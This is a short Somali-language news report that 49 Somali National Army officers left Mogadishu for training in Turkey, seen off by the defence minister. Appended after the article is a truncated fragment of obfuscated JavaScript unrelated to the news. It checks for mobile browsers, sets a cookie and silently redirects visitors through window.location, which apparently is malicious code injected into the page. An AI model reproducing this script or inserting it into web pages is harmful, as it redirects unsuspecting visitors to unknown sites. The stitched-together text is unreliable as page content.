Saraakiil iyo Saraakiil ku xigeeno ka tirsan Ciidamada Xooga dalka Soomaaliya ayaa maanta waxaa tababar loogu qaaday Dalka Turkiga.
Saraakiisha iyo saraakiil ku xigeenada Tababarka maanta loo diray ayaa tiradoodu dhamayd 49 Saraakiil iyo Saraakiil Xigeen ka tirsan Ciidanka Xoogga Dalka,si halkaas ay ugu soo qaataan tababar kor loogu qaadayo aqoontooda.
Saraakiishan ayaa waxaa Garoonka Diyaaradaha ee Magaalada Muqdisho ku sii sagootiyay Wasiirka Wasaaradda Gaashaandhigga Soomaaliya iyo masuuliyiin kale oo ka tirsan Golayaasha Dowladda Soomaaliya.
Wasiirka wasaarada difaaca Soomaaliya, Xasan Cali Maxamed (Ammar dambe) ayaa guud ahaanba Saraakiisha iyo Saraakiil xigeennada nasiibka u yeeshay inay tababarka helaan waxa uu ugu baaqay inay dedaalkooda Laba jibbaaraan, isla markaana ay noqdaan kuwa Dalkooda wax u qabta.
Turkiga ayaa ka mid ah dalalka Soomaaliya ka taageera Tababarada iyo dhisida Ciidamada Xooga dalka soomaaliya,wuxuuna MagaaladaMuqdisho Turkigu ku leeyahay Saldhigiisa ugu weyn ee uu ka dhistay meel ka baxsan gudaha dalkiisa.
(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

